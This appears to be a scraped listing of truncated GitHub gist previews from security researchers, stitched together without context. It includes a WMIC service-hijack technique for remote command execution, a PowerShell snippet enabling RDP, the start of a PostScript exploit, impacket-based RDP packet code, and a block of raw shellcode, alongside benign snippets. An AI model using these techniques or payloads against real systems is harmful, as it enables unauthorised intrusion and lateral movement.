Ridter

As always, only for use on networks you own or have permission to test against. 

Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps.  However, for one-offs this works fine as well.

The process involves a total of four commands, three of which can be combined on the command line to form one large block.

Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
    wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName

odzhan

//
// KITTY compression algorithm, by snowcat
// converted to C, by odzhan
// 2019-12-07
//
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <time.h>

adiroiban

param($RDPPort=3389)

$TSPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$RDPTCPpath = $TSPath + '\Winstations\RDP-Tcp'
Set-ItemProperty -Path $TSPath -name 'fDenyTSConnections' -Value 0

# RDP port
$portNumber = (Get-ItemProperty -Path $RDPTCPpath -Name 'PortNumber').PortNumber
Write-Host Get RDP PortNumber: $portNumber
if (!($portNumber -eq $RDPPort))

JohnLaTwC

olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------

Ridter

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% just copy from https://gist.github.com/hhc0null/82bf2e57ac93c1a48115a1b4afcde706
/exploit {
  /println  { (\\n) exch print print } bind executeonly def
  /info     { ([*] ) print println } bind executeonly def
  /success  { ([+] ) print println } bind executeonly def
  /fail     { ([-] ) print println stop } bind executeonly def
  
  /MaxFileSize 16#10000 def
  /readfile {

Ridter

using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;

/*

taviso

# man equivalent for msdn pages so I can look them up in the console.
function msdn()
{
    local lucky="https://www.google.com/search?btnI"
    local query="q=site:docs.microsoft.com+inurl:/en-us/windows/desktop/"
    local title="Microsoft Developer Network"
    local cache="${HOME}/.msdn/"

    if ! type lynx > /dev/null; then
        echo "error: lynx is not installed, please install it." 1>&2

n1xbyte

import socket, sys
from OpenSSL import SSL
from impacket.structure import Structure

class TPKT(Structure):
	header = (
	('Version','B=3'),
	('Reserved','B=0'),
	('Length','>H=len(TPDU)+4'),
	('_TPDU','_-TPDU','self["Length"]-4'),

NullArray

"\xbf\x27\x78\x9d\xde\xdb\xd5\xd9\x74\x24\xf4\x5d\x33\xc9\xb1"
"\x18\x83\xc5\x04\x31\x7d\x11\x03\x7d\x11\xe2\xd2\x49\x54\x57"
"\xd7\xc0\x20\x30\x2a\x94\xc7\xc5\xec\xa4\xde\x97\x64\xb4\x93"
"\x60\x10\x52\x7b\xa0\xa8\xc3\xeb\x91\x2d\x70\x8f\x64\x4e\x39"
"\xfa\x73\x5d\x3a\x97\x94\x7b\x3b\x98\x64\xf0\x4e\xfc\x05\x93"
"\xdd\x93\xab\x61\x5f\x16\x1b\xf1\x16\x95\x09\xcd\xd8\x6d\x87"
"\x7f\x7a\xb4\x27\x45\x4c\xf2\x7d\x96\x96\x2d\xe0\x81\x88\x1e"
"\x97\x39\x5f\x38\xdc\xe8\xa3\xd0\xe6\x52\x91\xa5\x8d\x63\x71"
"\x6b\xd1"

wideglide

;--------------------------------------------
; Name: Josh Bundt
; Class: IA6120
; Assignment 9
; File: decrypt_uuid.asm
; Last modified: 19 Mar 2019
;---------------------------------------------
; nasm -f bin decrypt_uuid.asm